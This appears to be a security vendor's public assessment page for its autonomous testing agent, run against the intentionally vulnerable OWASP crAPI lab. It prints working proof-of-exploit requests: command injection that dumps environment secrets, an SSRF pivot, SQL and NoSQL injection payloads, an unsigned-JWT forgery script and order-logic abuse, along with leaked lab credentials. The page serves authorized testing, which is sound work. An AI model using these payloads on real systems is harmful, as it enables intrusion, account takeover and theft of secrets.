AigentXby KomodoSec

Public technical assessment

From application URL to root compromise.

How AigentX autonomously mapped the OWASP crAPI API, tested 47 endpoints, validated 37 findings and built 7 attack chains, without source code, credentials or API documentation.

  • 47endpoints
  • 37validated findings
  • 7attack chains
  • rootaccess achieved

Conditions

No source. No credentials supplied. No API specification.

The test reproduced the starting point of an external attacker meeting an unfamiliar application.

Assessed
July 2026
Target
OWASP crAPI, deployed and operated by KomodoSec as an authorized lab
Input
Public application URL only
Access
Self-registration: a regular account created through the public flow
Documentation
None provided. No Swagger, OpenAPI, endpoint inventory or architecture docs
Code visibility
Black box. No source or repository access
Test design
No predefined test cases. The agent chose its own strategy

Method

From zero documentation to the complete API surface.

Coverage required understanding how the application works, not collecting paths and sending generic payloads.

  1. 01

    Discover entry points

    Identify registration, login, browser calls and service boundaries.

  2. 02

    Create valid state

    Register a user, authenticate and preserve tokens, identifiers and application objects.

  3. 03

    Follow business flows

    Upload media, create vehicle relationships, place orders and exercise community workflows.

  4. 04

    Map the API

    Enumerate 47 endpoints distributed across 4 microservices.

  5. 05

    Test every endpoint

    Apply context-aware authentication, authorization, injection and logic tests.

  6. 06

    Chain confirmed weaknesses

    Use outputs from one workflow as inputs to the next attack step.

Primary chain

A regular user became root.

The highest-impact result depended on carrying state across services and combining three behaviors that were less severe separately.

  1. 01

    Self-register

    Obtained legitimate ROLE_USER access.

  2. 02

    Create state

    Uploaded media to produce the video_id the next step required.

  3. 03

    Inject

    Placed shell metacharacters in conversion_params.

  4. 04

    Pivot

    Reached the internal convert_video endpoint via SSRF from a separate service.

  5. 05

    Execute

    Received command output from the identity container as root.

  6. 06

    Extract

    Recovered JWT_SECRET, DB_PASSWORD and TLS key material.

Proven impact. uid=0(root) command execution on crapi-identity, followed by extraction of DB_PASSWORD, JWT_SECRET and TLS keystore credentials.

7 paths from isolated weaknesses to business impact.

The chains show why correlation matters: the impact of one issue often depends on what another makes reachable.

ChainOutcomeCompositionRisk
AC-01Root compromiseSSRF + command injectionCritical
AC-02Zero-credential account takeoverPublic MailHog + OTP weaknessCritical
AC-03Permanent account takeoverUnsigned JWT + password resetCritical
AC-04Authenticated account takeoverSSRF + OTP interceptionHigh
AC-05Unlimited credit generationCoupon + order logic abuseHigh
AC-06Unauthenticated PII enumerationVIN disclosure + BOLAHigh
AC-07Fraudulent work ordersDirectory exposure + BFLAMedium
Severity distribution of 37 validated findings
SeverityFindings
Critical4
High19
Medium8
Low5
Informational1

37 validated findings.

Expand any finding with recorded evidence to see the requests and responses behind it. Every finding was reproduced against the live lab during review.

Filter

CVSS
9.4
Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
Proof of exploit, F001, block 1 of 3
POST /identity/api/v2/user/videos HTTP/1.1
Host: aigentx-lab.komodosec.com
Authorization: Bearer <ROLE_USER JWT>
Content-Type: multipart/form-data; boundary=----Boundary

------Boundary
Content-Disposition: form-data; name="file"; filename="hostname"
<any content>
------Boundary--

HTTP/1.1 200 OK
Content-Type: application/json

{"id":52,"video_name":"hostname","conversion_params":"-v codec h264"}
Proof of exploit, F001, block 2 of 3
PUT /identity/api/v2/user/videos/52 HTTP/1.1
Host: aigentx-lab.komodosec.com
Authorization: Bearer <ROLE_USER JWT>
Content-Type: application/json

{"conversion_params":"; env | grep -E \"(DB|MONGO|SECRET|KEY|PASS|TOKEN|JWT)\" | head -15"}

HTTP/1.1 200 OK
Proof of exploit, F001, block 3 of 3
POST /workshop/api/merchant/contact_mechanic HTTP/1.1
Host: aigentx-lab.komodosec.com
Authorization: Bearer <ROLE_USER JWT>
Content-Type: application/json

{
  "mechanic_code": "TRAC_JHN",
  "problem_details": "env validation",
  "mechanic_api": "https://crapi-identity:8080/identity/api/v2/user/videos/convert_video?video_id=52"
}

HTTP/1.1 200 OK
Content-Type: application/json

{
  "response_from_mechanic_api": {
    "message": "DB_PASSWORD=crapisecretpassword\nJWT_EXPIRATION=604800000\nDB_PORT=5432\nDB_USER=admin\nDB_HOST=postgresdb\nJWT_SECRET=crapi\nTLS_KEYSTORE_PASSWORD=passw0rd\nTLS_KEY_PASSWORD=passw0rd\n",
    "status": 200
  },
  "status": 200
}
CVSS
8.7
Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Proof of exploit, F002, block 1 of 3
POST /workshop/api/shop/apply_coupon HTTP/2
Host: aigentx-lab.komodosec.com
Authorization: Bearer <ROLE_USER JWT>
Content-Type: application/json

{"coupon_code":"test'","amount":100}

HTTP/2 500 Internal Server Error
Proof of exploit, F002, block 2 of 3
POST /workshop/api/shop/apply_coupon HTTP/2
Host: aigentx-lab.komodosec.com
Authorization: Bearer <ROLE_USER JWT>
Content-Type: application/json

{"coupon_code":"x' UNION SELECT (SELECT email::text || chr(58) || password FROM public.user_login WHERE role=3 LIMIT 1)--","amount":100}

HTTP/2 400 Bad Request
Content-Type: application/json

{"message":"admin@example.com:$2a$10$dKcpPC5ymDaffQOzGV1I4e2FQKq0v3a0W1mNP2NFgWsx0wObXhnHW Coupon code is already claimed by you!! Please try with another coupon code"}
Proof of exploit, F002, block 3 of 3
POST /workshop/api/shop/apply_coupon HTTP/2
Host: aigentx-lab.komodosec.com
Authorization: Bearer <ROLE_USER JWT>
Content-Type: application/json

{"coupon_code":"';SELECT PG_SLEEP(5)--","amount":100}
F003HighServer-Side Request Forgery via Unvalidated mechanic_api
CVSS
9.3
Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
Proof of exploit, F004, block 1 of 3
import base64
import json

def b64url(data):
    return base64.urlsafe_b64encode(
        json.dumps(data).encode()
    ).rstrip(b'=').decode()

header = b64url({
    "alg": "none",
    "typ": "JWT"
})

payload = b64url({
    "sub": "admin@example.com",
    "exp": 9999999999,
    "role": "admin"
})

token = f"{header}.{payload}."
print(token)
Proof of exploit, F004, block 2 of 3
GET /identity/api/v2/user/dashboard HTTP/2
Host: aigentx-lab.komodosec.com
Authorization: Bearer eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.eyJzdWIiOiAiYWRtaW5AZXhhbXBsZS5jb20iLCAiZXhwIjogOTk5OTk5OTk5OSwgInJvbGUiOiAiYWRtaW4ifQ.

HTTP/2 200 OK
Content-Type: application/json

{"id":5,"name":"Admin","email":"admin@example.com","number":"9010203040","picture_url":null,"available_credit":100.0,"role":"ROLE_ADMIN"}
Proof of exploit, F004, block 3 of 3
POST /identity/api/v2/user/reset-password HTTP/2
Host: aigentx-lab.komodosec.com
Authorization: Bearer eyJhbGciOiAibm9uZSIsICJ0eXAiOiAiSldUIn0.[admin_payload].
Content-Type: application/json

{"password":"AttackerPermanent!"}

HTTP/2 200 OK
Content-Type: application/json

{"message":"Password reset successful.","status":0}
F005HighJWT Algorithm Confusion - HS256 Forgery via RSA Public Key
F006HighJWT Secret Exposed via RCE - HS256 Token Forgery
F007HighPath Traversal / Arbitrary File Read via Double URL-Encoding
F008HighLocal File Inclusion via Profile Picture Upload
F009HighPublicly Accessible .env File Exposes Database Credentials
F010MediumUnrestricted File Upload on Picture and Video Endpoints
F011CriticalUnauthenticated MailHog Enables Zero-Click Account Takeover
F012HighMissing Rate Limiting on OTP Verification
F013HighPassword Reset Without Current Password Verification
F014HighUnauthenticated Shop Orders Expose Payment Card Data
F015HighUnauthenticated Mechanic Requests Expose PII
F016HighBOLA Exposes Vehicle GPS Location and Owner PII
F017HighBOLA/IDOR in Change-Email Enables Account Takeover
F018HighBOLA + BFLA Allows Reading Any Mechanic Report
F019HighBOLA Exposes Merchant Service History for Any VIN
F020HighNo Rate Limiting on Vehicle Pincode
Proof of exploit, F021
POST /workshop/api/shop/apply_coupon
{"coupon_code":"TRAC075","amount":500}
-> {"credit":600.0,"message":"Coupon successfully applied!"}

POST /workshop/api/shop/orders
{"product_id":1,"quantity":-1}
-> {"message":"Order sent successfully.","credit":610.0}
F022HighNegative Quantity Order Generates Unlimited Credit
Vector
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
CWE
CWE-943 — Improper Neutralization of Special Elements in Data Query Logic
Proof of exploit, F023, block 1 of 2
POST /community/api/v2/coupon/validate-coupon HTTP/1.1
Host: aigentx-lab.komodosec.com
Authorization: Bearer <JWT>
Content-Type: application/json

{}

HTTP/1.1 200 OK
Content-Type: application/json

{"coupon_code":"TRAC075","amount":10}
Proof of exploit, F023, block 2 of 2
POST /community/api/v2/coupon/validate-coupon HTTP/1.1
Host: aigentx-lab.komodosec.com
Authorization: Bearer <JWT>
Content-Type: application/json

{"coupon_code":{"$ne":null}}

HTTP/1.1 200 OK
Content-Type: application/json

{"coupon_code":"TRAC075","amount":10}
F024MediumDeprecated Login-With-Token Endpoint Remains Active
F025MediumNo Login Lockout or Rate Limiting
F026MediumNo Rate Limiting on User Registration
F027MediumBFLA Allows Users to Create Mechanic Requests for Any Vehicle
F028MediumMechanic Directory Exposed to All Authenticated Users
F029MediumGlobal Coupon Codes Reusable Across Accounts
F030LowMissing Server-Side Sanitization on Community Comments
F031LowUnvalidated redirect_url in Password Reset
F032LowUser Enumeration via Distinct Error Messages
F033LowCORS Wildcard Across Multiple Services
F034LowMissing and Misconfigured Security Headers
F035InformationalChatbot State Accessible Without Authentication
F036HighNo Rate Limiting on Phone OTP Verification
F037MediumNo Rate Limiting on Forget-Password OTP Trigger

AigentX tests applications as systems, not collections of URLs.

Automated scanners test known signatures against known paths. AigentX explores how the application works, identifies what each workflow makes possible and continues until the real attack path is understood.

OWASP crAPI is an intentionally vulnerable open-source application designed for API security training. This assessment ran against KomodoSec's authorized lab deployment. The value demonstrated is not that crAPI contains vulnerabilities, but that AigentX discovered the surface and validated the set without source code, credentials or API documentation.

Book a demo